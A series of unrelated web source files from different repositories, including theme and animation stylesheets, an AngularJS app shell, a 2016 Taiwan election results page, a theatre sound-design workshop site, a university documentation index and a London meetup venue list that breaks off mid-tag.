/* Theme Name: Pacify Child Theme URI: http://doc.cdsea91.fr/saemf Description: Pacify is an elegant looking simplistic theme for WordPress. This responsive theme is optimized for viewing on multiple devices. It allows you to select a logo but even if isn't provided, it uses a stylish font to display your website's heading, to add to the aesthetics. It supports the WordPress theme customizer as well tat allows you to change the colors, fonts and more. Pacify has a single sidebar layout with multiple widget support. it uses an minimalistic background pattern for the navigation and footer area. This lightweight theme is ideal for almost all types of personal blogs, beauty and hobbyist blogs, travel blogs, journals, fashion blogs, mommy blogs and more. Author: Christophe Violeau Author URI: http://www.marquedefabrique.net Template: pacify Version: 0.9 License: GNU General Public License v2 or later License URI: http://www.gnu.org/licenses/gpl-2.0.html Tags: black, white, two-columns, right-sidebar, custom-menu, responsive-layout, gray, silver, featured-images, post-formats, sticky-post, custom-background, threaded-comments, black Text Domain: pacify */ body { background: #ffffff; } blockquote p { line-height: 1.3em; text-align: justify; font-family: 'Droid Serif', serif; font-size: .9em; } blockquote { quotes: '"' '"'; padding: 1em 2em; color: #095A99; } .entry-title { font-size: 1.2em; } .entry-meta { font-size: .7em; line-height: 1.2em; } .entry-content { font-size: .9em; } .entry-content ul { list-style-type: circle; } .entry-footer { display:none; } .post { padding: 8px 15px; } .hentry { margin: 0 0 1em;} .posted-on { background-size: 1.3em; } .byline { display: inline; } /* 4.0 Forms */ .username input, .password input { height: 30px; } /* 5.2 Menus */ .children { list-style: disc inside; } .jcl_symbol { float: right; }
presentations/java-mysterious-hotspot/css/animation.css
gvsmirnov/docs
/*! * jmpress.js v0.4.5 * http://jmpressjs.github.com/jmpress.js * * A jQuery plugin to build a website on the infinite canvas. * * Copyright 2013 Kyle Robinson Young @shama & Tobias Koppers @sokra * Licensed MIT * http://www.opensource.org/licenses/mit-license.php * * Based on the foundation laid by Bartek Szopka @bartaz */ .will-appear { display: none; } .do-appear { display: inline; } .will-disappear { display: inline; } .do-disappear { display: none; } .will-become-green { background-color:#ffcccc; } .do-become-green { background-color:#ccffcc; } .will-drive-right, .will-drive-left { position: relative; -webkit-transition: opacity 0.6s, left 1s; -moz-transition: opacity 0.6s, left 1s; -ms-transition: opacity 0.6s, left 1s; -o-transition: opacity 0.6s, left 1s; transition: opacity 0.6s, left 1s; opacity: 0; } .will-drive-right { left: -300px; } .will-drive-left { left: 300px; } .will-drive-down, .will-drive-up { position: relative; -webkit-transition: opacity 0.6s, top 1s; -moz-transition: opacity 0.6s, top 1s; -ms-transition: opacity 0.6s, top 1s; -o-transition: opacity 0.6s, top 1s; transition: opacity 0.6s, top 1s; opacity: 0; } .will-drive-down { top: -300px; } .will-drive-up { top: 300px; } .do-drive-up, .do-drive-down { opacity: 1; top: 0px; } .do-drive-right, .do-drive-left { opacity: 1; left: 0px; } .will-expand { -webkit-transition: all 1s; -moz-transition: all 1s; -ms-transition: all 1s; -o-transition: all 1s; transition: all 1s; opacity: 0; -webkit-transform: translate3d(0,0,1px) scale(0.7,1); -moz-transform: translate3d(0,0,1px) scale(0.7,1); -ms-transform: translate3d(0,0,1px) scale(0.7,1); -o-transform: translate3d(0,0,1px) scale(0.7,1); transform: translate3d(0,0,1px) scale(0.7,1); } .do-expand { opacity: 1; -webkit-transform: translate3d(0,0,1px) scale(1,1); -moz-transform: translate3d(0,0,1px) scale(1,1); -ms-transform: translate3d(0,0,1px) scale(1,1); -o-transform: translate3d(0,0,1px) scale(1,1); transform: translate3d(0,0,1px) scale(1,1); } .has-expand { -webkit-transform: none; -moz-transform: none; -ms-transform: none; -o-transform: none; transform: none; } .will-fade { -webkit-transition: opacity 1s; -moz-transition: opacity 1s; -ms-transition: opacity 1s; -o-transition: opacity 1s; transition: opacity 1s; opacity: 0; } .will-fade-slow { -webkit-transition: opacity 2s; -moz-transition: opacity 2s; -ms-transition: opacity 2s; -o-transition: opacity 2s; transition: opacity 2s; opacity: 0; } .will-fade-fast { -webkit-transition: opacity 0.5s; -moz-transition: opacity 0.5s; -ms-transition: opacity 0.5s; -o-transition: opacity 0.5s; transition: opacity 0.5s; opacity: 0; } .do-fade, .do-fade-slow, .do-fade-fast, .has-fade, .has-fade-slow, .has-fade-fast{ opacity: 1; } .will-warp-right, .will-warp-left { position: relative; -webkit-transition: opacity 0.2s, left 0.5s ease-in-out; -moz-transition: opacity 0.2s, left 0.5s ease-in-out; -ms-transition: opacity 0.2s, left 0.5s ease-in-out; -o-transition: opacity 0.2s, left 0.5s ease-in-out; transition: opacity 0.2s, left 0.5s ease-in-out; opacity: 0; } .will-warp-right { left: -600px; } .will-warp-left { left: 600px; } .will-warp-down, .will-warp-up { position: relative; -webkit-transition: opacity 0.2s, top 0.5s ease-in-out; -moz-transition: opacity 0.2s, top 0.5s ease-in-out; -ms-transition: opacity 0.2s, top 0.5s ease-in-out; -o-transition: opacity 0.2s, top 0.5s ease-in-out; transition: opacity 0.2s, top 0.5s ease-in-out; opacity: 0; } .will-warp-down { top: -600px; } .will-warp-up { top: 600px; } .do-warp-up, .do-warp-down { opacity: 1; top: 0px; } .do-warp-right, .do-warp-left { opacity: 1; left: 0px; } .will-zoom { -webkit-transition: all 1s ease-in-out; -moz-transition: all 1s ease-in-out; -ms-transition: all 1s ease-in-out; -o-transition: all 1s ease-in-out; transition: all 1s ease-in-out; opacity: 0; -webkit-transform: translate3d(0,0,1px) scale(10,10); -moz-transform: translate3d(0,0,1px) scale(10,10); -ms-transform: translate3d(0,0,1px) scale(10,10); -o-transform: translate3d(0,0,1px) scale(10,10); transform: translate3d(0,0,1px) scale(10,10); } .do-zoom { opacity: 1; -webkit-transform: translate3d(0,0,1px) scale(1,1); -moz-transform: translate3d(0,0,1px) scale(1,1); -ms-transform: translate3d(0,0,1px) scale(1,1); -o-transform: translate3d(0,0,1px) scale(1,1); transform: translate3d(0,0,1px) scale(1,1); } .has-zoom { -webkit-transform: none; -moz-transform: none; -ms-transform: none; -o-transform: none; transform: none; }
client/index.html
flexion/flexion-ads-18f-save-my-picnic
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <base href="/"> <title></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- build:css({.tmp,client}) app/app.css --> <link rel="stylesheet" href="app/app.css"> <!-- injector:css --> <!-- endinjector --> <!-- endbuild --> </head> <body ng-app="picnicApp"> <div ui-view="" autoscroll="true"></div> <!--[if lt IE 9]> <script src="bower_components/es5-shim/es5-shim.js"></script> <script src="bower_components/json3/lib/json3.min.js"></script> <![endif]--> <!-- build:js({client,node_modules}) app/vendor.js --> <!-- bower:js --> <script src="bower_components/jquery/dist/jquery.js"></script> <script src="bower_components/angular/angular.js"></script> <script src="bower_components/angular-resource/angular-resource.js"></script> <script src="bower_components/angular-cookies/angular-cookies.js"></script> <script src="bower_components/angular-sanitize/angular-sanitize.js"></script> <script src="bower_components/angular-bootstrap/ui-bootstrap-tpls.js"></script> <script src="bower_components/lodash/dist/lodash.compat.js"></script> <script src="bower_components/angular-ui-router/release/angular-ui-router.js"></script> <script src="bower_components/d3/d3.js"></script> <script src="bower_components/nvd3/build/nv.d3.js"></script> <script src="bower_components/angularjs-nvd3-directives/dist/angularjs-nvd3-directives.js"></script> <script src="bower_components/typeahead.js/dist/typeahead.bundle.js"></script> <script src="bower_components/angular-typeahead/angular-typeahead.js"></script> <script src="bower_components/spin.js/spin.js"></script> <script src="bower_components/angular-spinner/angular-spinner.js"></script> <script src="bower_components/angular-aria/angular-aria.js"></script> <!-- endbower --> <!-- endbuild --> <!-- build:js({.tmp,client}) app/app.js --> <script src="app/app.js"></script> <!-- injector:js --> <script src="app/main/main.js"></script> <script src="components/footer/footer.js"></script> <script src="components/header/header.js"></script> <!-- endinjector --> <!-- endbuild --> </body> </html>
data/president/n710001600000000/20160116123227/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeP1.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_1.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe main-pvpe-current" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>總統副總統選舉&nbsp;候選人在 臺東縣 蘭嶼鄉得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;候選組數:3&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;應選組數:1</td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td><table><tr><td>總統</td><td rowspan=2> 候選人姓名</td></tr><td>副總統</td></table></td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>登記方式</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>朱立倫<br>王如玄</td> <td>男<br>女</td> <td class="tdAlignRight">382</td> <td class="tdAlignRight">29.4299</td> <td>中國國民黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>蔡英文<br>陳建仁</td> <td>女<br>男</td> <td class="tdAlignRight">299</td> <td class="tdAlignRight">23.0354</td> <td>民主進步黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>宋楚瑜<br>徐欣瑩</td> <td>男<br>女</td> <td class="tdAlignRight">617</td> <td class="tdAlignRight">47.5347</td> <td>親民黨&nbsp; 推薦</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;4/4&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>自然當選</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 20:30:12 +0800" title="Sat, 16 Jan 2016 20:30:12 +0800">&nbsp;資料更新時間:&nbsp;01/16&nbsp;20:30:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter" align=center>[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
index.html
sonidoescenico/sonidoescenico.github.io
<!DOCTYPE html> <html lang="es"> <!-- Created using jsbin.com Source can be edited via http://jsbin.com/tesocola/1/edit --> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <title>Taller de Sonido escénico - Malena Graciosi</title> <!-- Bootstrap Core CSS --> <link href="http://netdna.bootstrapcdn.com/bootstrap/3.0.3/css/bootstrap.min.css" rel="stylesheet" type="text/css"> <!-- Fonts --> <link href="http://netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Montserrat:400,700' rel='stylesheet' type='text/css'> <!-- Custom Theme CSS --> <link href="ahttp://startbootstrap.com/templates/grayscale/css/grayscale.css" rel="stylesheet"> <style id="jsbin-css"> body { width: 100%; height: 100%; font-family: Lora,"Helvetica Neue",Helvetica,Arial,sans-serif; color: #fff; background-color: #000; } html { width: 100%; height: 100%; } h1, h2, h3, h4, h5, h6 { margin: 0 0 35px; text-transform: uppercase; font-family: Montserrat,"Helvetica Neue",Helvetica,Arial,sans-serif; font-weight: 700; letter-spacing: 1px; } p { margin: 0 0 25px; font-size: 18px; line-height: 1.5; } @media(min-width:767px) { p { margin: 0 0 35px; font-size: 20px; line-height: 1.6; } } a { color: #28c3ab; -webkit-transition: all .2s ease-in-out; -moz-transition: all .2s ease-in-out; transition: all .2s ease-in-out; } a:hover, a:focus { text-decoration: none; color: #176e61; } .light { font-weight: 400; } .navbar { margin-bottom: 0; border-bottom: 1px solid rgba(255,255,255,.3); text-transform: uppercase; font-family: Montserrat,"Helvetica Neue",Helvetica,Arial,sans-serif; background-color: #000; } .navbar-brand { font-weight: 700; } .navbar-brand:focus { outline: 0; } .navbar-custom a { color: #fff; } .navbar-custom .nav li a { -webkit-transition: background .3s ease-in-out; -moz-transition: background .3s ease-in-out; transition: background .3s ease-in-out; } .navbar-custom .nav li a:hover, .navbar-custom .nav li a:focus, .navbar-custom .nav li.active { outline: 0; background-color: rgba(255,255,255,.2); } .navbar-toggle { padding: 4px 6px; font-size: 16px; color: #fff; } .navbar-toggle:focus, .navbar-toggle:active { outline: 0; } @media(min-width:767px) { .navbar { padding: 20px 0; border-bottom: 0; letter-spacing: 1px; background: 0 0; -webkit-transition: background .5s ease-in-out,padding .5s ease-in-out; -moz-transition: background .5s ease-in-out,padding .5s ease-in-out; transition: background .5s ease-in-out,padding .5s ease-in-out; } .top-nav-collapse { padding: 0; background-color: #000; } .navbar-custom.top-nav-collapse { border-bottom: 1px solid rgba(255,255,255,.3); } } .intro { display: table; width: 100%; height: auto; padding: 100px 0; text-align: center; color: #fff; background: url(http://startbootstrap.com/templates/grayscale/img/intro-bg.jpg) no-repeat bottom center scroll; background-color: #000; -webkit-background-size: cover; -moz-background-size: cover; background-size: cover; -o-background-size: cover; } .intro-body { display: table-cell; vertical-align: middle; } .brand-heading { font-size: 40px; } .intro-text { font-size: 18px; } @media(min-width:767px) { .intro { height: 100%; padding: 0; } .brand-heading { font-size: 100px; } .intro-text { font-size: 25px; } } .btn-circle { width: 70px; height: 70px; margin-top: 15px; padding: 7px 16px; border: 2px solid #fff; border-radius: 35px; font-size: 40px; color: #fff; background: 0 0; -webkit-transition: background .3s ease-in-out; -moz-transition: background .3s ease-in-out; transition: background .3s ease-in-out; } .btn-circle:hover, .btn-circle:focus { outline: 0; color: #fff; background: rgba(255,255,255,.1); } .page-scroll .btn-circle i.animated { -webkit-transition-property: -webkit-transform; -webkit-transition-duration: 1s; -moz-transition-property: -moz-transform; -moz-transition-duration: 1s; } .page-scroll .btn-circle:hover i.animated { -webkit-animation-name: pulse; -moz-animation-name: pulse; -webkit-animation-duration: 1.5s; -moz-animation-duration: 1.5s; -webkit-animation-iteration-count: infinite; -moz-animation-iteration-count: infinite; -webkit-animation-timing-function: linear; -moz-animation-timing-function: linear; } @-webkit-keyframes pulse { 0 { -webkit-transform: scale(1); transform: scale(1); } 50% { -webkit-transform: scale(1.2); transform: scale(1.2); } 100% { -webkit-transform: scale(1); transform: scale(1); } } @-moz-keyframes pulse { 0 { -moz-transform: scale(1); transform: scale(1); } 50% { -moz-transform: scale(1.2); transform: scale(1.2); } 100% { -moz-transform: scale(1); transform: scale(1); } } .content-section { padding-top: 100px; } .download-section { width: 100%; padding: 50px 0; color: #fff; background: url(http://startbootstrap.com/templates/grayscale/img/downloads-bg.jpg) no-repeat center center scroll; background-color: #000; -webkit-background-size: cover; -moz-background-size: cover; background-size: cover; -o-background-size: cover; } #map { width: 100%; height: 200px; margin-top: 100px; } @media(min-width:767px) { .content-section { padding-top: 250px; } .download-section { padding: 100px 0; } #map { height: 400px; margin-top: 250px; } } .btn { text-transform: uppercase; font-family: Montserrat,"Helvetica Neue",Helvetica,Arial,sans-serif; font-weight: 400; -webkit-transition: all .3s ease-in-out; -moz-transition: all .3s ease-in-out; transition: all .3s ease-in-out; } .btn-default { border: 1px solid #28c3ab; color: #28c3ab; background-color: transparent; } .btn-default:hover, .btn-default:focus { border: 1px solid #28c3ab; outline: 0; color: #000; background-color: #28c3ab; } .btn-huge { padding: 25px; font-size: 26px; } .banner-social-buttons { margin-top: 0; } @media(max-width:1199px) { ul.banner-social-buttons { margin-top: 15px; } } @media(max-width:767px) { ul.banner-social-buttons>li { display: block; margin-bottom: 20px; padding: 0; } ul.banner-social-buttons>li:last-child { margin-bottom: 0; } } ::-moz-selection { text-shadow: none; background: #fcfcfc; background: rgba(255,255,255,.2); } ::selection { text-shadow: none; background: #fcfcfc; background: rgba(255,255,255,.2); } img::selection { background: 0 0; } img::-moz-selection { background: 0 0; } body { webkit-tap-highlight-color: rgba(255,255,255,.2); } </style> </head> <body id="page-top" data-spy="scroll" data-target=".navbar-custom"> <nav class="navbar navbar-custom navbar-fixed-top" role="navigation"> <div class="container"> <div class="navbar-header page-scroll"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-main-collapse"> <i class="fa fa-bars"></i> </button> <a class="navbar-brand" href="#page-top"> <i class="fa fa-play-circle"></i> <span class="light">Taller</span> Diseño Sonoro </a> </div> <!-- Collect the nav links, forms, and other content for toggling --> <div class="collapse navbar-collapse navbar-right navbar-main-collapse"> <ul class="nav navbar-nav"> <!-- Hidden li included to remove active class from about link when scrolled up past about section --> <li class="hidden"> <a href="#page-top"></a> </li> <li class="page-scroll"> <a href="#video">Porqué</a> </li> <li class="page-scroll"> <a href="#about">Contenido del taller</a> </li> <li class="page-scroll"> <a href="#malenagraciosi">A cargo de...</a> </li> <li class="page-scroll"> <a href="#contact">Contacto</a> </li> </ul> </div> <!-- /.navbar-collapse --> </div> <!-- /.container --> </nav> <section class="intro"> <div class="intro-body"> <div class="container"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <h1 class="brand-heading">Sonido Escénico</h1> <p class="intro-text">La dimensión sonora de lo espectacular.</p> <div class="page-scroll"> <a href="#about" class="btn btn-circle"> <i class="fa fa-angle-double-down animated"></i> </a> </div> </div> </div> </div> </div> </section> <section id="video" class="container text-center"> <div class="row"> <div class="col-lg-8 col-lg-offset-2"> <h2>Por qué <br/><small>un taller de Diseño Sonoro</small></h2> <p> <object width="853" height="480"><param name="movie" value="//www.youtube.com/v/IM0i2kOPhmQ?version=3&amp;hl=es_MX&amp;rel=0&amp;cc_load_policy=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="//www.youtube.com/v/IM0i2kOPhmQ?version=3&amp;hl=es_MX&amp;rel=0&amp;cc_load_policy=1" type="application/x-shockwave-flash" width="853" height="480" allowscriptaccess="always" allowfullscreen="true"></embed></object> </p> </div> </div> </section> <section id="about" class="container content-section text-center"> <div class="row"> <div class="col-lg-8 col-lg-offset-2"> <h3>Contenido</h3> <p>Este taller te da una mano para entender el <strong>diseño sonoro</strong> aplicado a las <a href="https://es.wikipedia.org/wiki/Artes_esc%C3%A9nicas" target="_blank">artes escénicas</a>, tomando como referencia la actividad teatral de Buenos Aires, en particular de las producciones de lo que se conoce como <em>circuito de los teatros independientes</em>. </p> <p> Este proyecto nace de la necesidad de documentar técnicas que no suelen tener espacio en los estudios teatrales formales o académicos como tampoco en las criticas o comentarios de revistas especializadas.</p> </p> <h4>1. La dimensión sonora de lo espectacular</h4> <p>La dimensión visual está muy explotada en el teatro, sobretodo desde el vestuario, la escenografía y la luz. Pero a diferencia de el cine, el espacio sonoro siempre queda relegado.</p> <h4>2. Paisaje sonoro</h4> <p> El paisaje sonoro busca describir ante el espactador un espacio particular, ya sea que existe en la realidad y lo evoca o que sea un paisaje ficticio, propio del relato y participa en su construcción. </p> <h4>3. Análisis de un planteo sonoro </h4> <p> Un hecho teatral puede tener un estrato argumental o varios simultáneamente. La música puede deliberadamente remarcar las diferencias entre esos estratos argumentales o no hacerlo. </p> </div> </div> </section> <section id="aboutmalena" class="container content-section text-center"> <div class="row"> <div class="col-lg-8 col-lg-offset-2"> </div> </div> </section> <section id="malenagraciosi" class="content-section text-center"> <div class="download-section"> <div class="container"> <div class="col-lg-8 col-lg-offset-2"> <h2>Malena Graciosi</h2> <p><em>Instrumentista. Diseñadora sonora</em></p> <p>Desde el año 2002 me dedico a la composición de música original y diseño sonoro para espectáculos teatrales. </p> <p>Hasta la fecha hice y produje la música original de <a target="_blank" href="http://www.alternativateatral.com/persona5802-malena-graciosi#obras">más de 20 espectáculos</a></p> <p>He sido distinguida con el Premio Argentores a la mejor música original de la temporada 2007 por la banda sonora del espectáculo <a target="_blank" href="http://www.alternativateatral.com/obra7759-tartufo">“Tartufo” de Moliere</a>, adaptación de Roberto Cossa en el Teatro El Payró, y con el Premio Florencio Sánchez a la mejor música original de la temporada 2011 por el diseño sonoro del espectáculo <a target="_blank" href="http://www.alternativateatral.com/obra19386-yepeto">“Yepeto, segunda versión”</a> de Roberto Cossa, Teatro Nacional Cervantes.</p> <a target="_blank" href="http://www.alternativateatral.com/persona5802-malena-graciosi" class="btn btn-default btn-lg">Mi perfil en Alternativa Teatral</a> </div> </div> </div> </section> <section id="contact" class="container content-section text-center"> <div class="row"> <div class="col-lg-8 col-lg-offset-2"> <h2>Contacto</h2> <p>malena.graciosi@gmail.com</p> <ul class="list-inline banner-social-buttons"> <li><a href="https://www.facebook.com/malena.graciosi" target="_blank" class="btn btn-default btn-lg"><i class="fa fa-facebook fa-fw"></i> <span class="network-name">Facebook</span></a> </li> <li><a href="https://plus.google.com/106159075770684512399" target="_blank" class="btn btn-default btn-lg"><i class="fa fa-google-plus fa-fw"></i> <span class="network-name">Google+</span></a> </li> </ul> </div> </div> </section> <!-- Core JavaScript Files --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script> <script src="http://netdna.bootstrapcdn.com/bootstrap/3.0.3/js/bootstrap.min.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.3/jquery.easing.min.js"></script> <!-- Custom Theme JavaScript --> <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/fitvids/1.0.3/jquery.fitvids.min.js"> </script> <script> $(function() { $("body").fitVids(); }); //jQuery to collapse the navbar on scroll $(window).scroll(function() { if ($(".navbar").offset().top > 50) { $(".navbar-fixed-top").addClass("top-nav-collapse"); } else { $(".navbar-fixed-top").removeClass("top-nav-collapse"); } }); //jQuery for page scrolling feature - requires jQuery Easing plugin $(function() { $('.page-scroll a').bind('click', function(event) { var $anchor = $(this); $('html, body').stop().animate({ scrollTop: $($anchor.attr('href')).offset().top }, 1500, 'easeInOutExpo'); event.preventDefault(); }); }); </script> </body> </html>
index.html
ubbochum/ubbochum.github.io
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="generator" content="pandoc"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes"> <meta name="dcterms.date" content="2015-12-10"> <title>Project and API Docs</title> <style type="text/css">code { white-space: pre; }</style> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css"> <link rel="stylesheet" href="css/rub.css"> </head> <body> <!--<header> <nav id="header" class="navbar navbar-default navbar-fixed-top" role="navigation"> <div class="container-fluid"><div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#oa_nav"> <span class="sr-only">Toggle navigation</span> <span><i class="fa fa-bars"></i></span> </button> </div> <a class="navbar-brand" href="https://www.rub.de" title="Ruhr-Universität Bochum"> <img src="https://static.ub.rub.de/myopac/rub-img/rub_script.svg" id="rub-wortmarke" alt="RUB-Wortmarke"/> </a> <span class="navbar-right"> <a href="https://www.rub.de" title="Ruhr-Universität Bochum"> <img src="https://static.ub.rub.de/myopac/rub-img/rub_logo.svg" id="rub-label" alt="RUB-Label"/> </a> </span> <ul class="nav navbar-nav"> <li><a href="http://www.ub.rub.de/">University Library</a></li> <li><a href="/">Documentation</a></li> </ul> </div> </nav> </header>--> <div class="container"> <!--<p><a href="https://github.com/ubbochum/ubbochum.github.io"><img style="position: absolute; top: 54px; right: 0; border: 0;" src="https://camo.githubusercontent.com/652c5b9acfaddf3a9c326fa6bde407b87f7be0f4/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f72696768745f6f72616e67655f6666373630302e706e67" alt="Fork me on GitHub" data-canonical-src="https://s3.amazonaws.com/github/ribbons/forkme_right_orange_ff7600.png"></a></p> --> <header class="main"> <p><span class="pull-left"> <a href="https://www.rub.de" title="Ruhr-Universität Bochum"> <img src="https://static.ub.rub.de/myopac/rub-img/rub_script.svg" id="rub-wortmarke" alt="RUB-Wortmarke"/> </a> </span> <span class="pull-right"> <span class="header-nav"><a href="http://www.rub.de">startseite</a> | <a href="http://www.rub.de/uebersicht/">übersicht</a> | <a href="http://www.rub.de/suche/">suche</a> | <a href="http://www.rub.de/a-z/">a-z</a></span> <a href="https://www.rub.de" title="Ruhr-Universität Bochum"> <img src="https://static.ub.rub.de/myopac/rub-img/rub_logo.svg" id="rub-label" alt="RUB-Label"/> </a> </span></p> <h1>Project and API Docs</h1> </header> <main><ul> <li><a href="orcid-manual.html">Manual zur ORCID-Registrierung</a> (German)</li> <li><a href="kalender-manual.html">Manual zur Verwendung des eGroupware-Kalenders in Thunderbird</a> (German)</li> </ul></main> <footer> <hr> <p>Last changed: <time datetime="2015-12-10">2015-12-10</time></p> </footer> </div> </body> </html>
search/posts/118.html
sunbjt/cboettig.github.com
<!--This layout is used by Marran's search plugin to specify the format of search returns --> <div class="search-entry"> <div class="title"><a href="/2010/05/26/Rethinking-Beetles-Noise.html" title="Rethinking Beetles Noise"><b>Rethinking Beetles Noise</b> <i>26 May 2010</i></a> </div> </div>
uk_east_london.html
alex/computer
<!DOCTYPE html> <html> <head> <title>computer anonymous</title> <link href="style.css" rel="stylesheet"> <meta name="viewport" content="width=device-width, user-scalable=false;"> <meta http-equiv="content-type" content="text/html; charset=utf-8"> </head> <body> <section class="content"> <h1>Computer Anonymous — East London</h1> <p>Read <a href="index.html">The overview</a> if you haven't already.</p> <h2>The Meetings</h2> <p>First meeting: Thursday the 3rd of October, at <a href="http://www.individualpubs.co.uk/pembury/">The Pembury Tavern</a>, <a href="http://osm.org/go/euu7IkpEN-?m=">90 Amhurst Rd, E8 1JH</a></p> <p>We plan to have regular meetings every two weeks, or every month. We haven't worked out things yet.</p> <h3>Possible Venues for Meetings</h3> <p><a href="http://www.individualpubs.co.uk/pembury/">The Pembury Tavern</a>, <a href="http://osm.org/go/euu7IkpEN-?m=">90 Amhurst Rd, E8 1JH</a></p> <ul> <li>Lots of Space</li> <li>Near two stations</li> <li>Geek friendly</li> <li>Good beer and food</li> </ul> <p><a href="http://www.oldfountain.co.uk/">The Old Fountain</a>, <a href="http://osm.org/go/euu46rHfs-?m=">3 Baldwin St, London, Greater London EC1V 9NU</a></p> <ul> <li>Some space. Can get busy.</li> <li>Bar Snacks. Excellent beer.</li> <li>Very close to shoreditch/old street.</li> </ul> <p><a href="http://www.yelp.co.uk/biz/hurwundeki-cafe-antiques-london">Hurwundeki Cafe</a>, <a href="http://osm.org/go/euu6ZpMW?m=">298-299 Arches Cambridge Heath Road, E2 9HA London</a></p> <ul> <li>Haircuts</li> <li>Bibimbap</li> </ul> <p><a href="http://www.sebrightarms.co.uk/">Sebright Arms</a>, <a href="http://osm.org/go/euu6ZIVu?m=">Coates Street, off Hackney Road (Cambridge Heath)</a></p> <ul> <li>Excellent food</li> </ul> <p><a href="http://www.thedukeofwellingtonn1.com/">The Duke of Wellington</a> <a href="http://osm.org/go/euu6VzZK?m=">119 Balls Pond Road, Dalston</a></p> <ul> <li>Side room is frequently near empty on weeknights</li> <li>Close to, but not in, Shoreditch</li> <li>Good (local) beer, food</li> </ul> <p><s><a 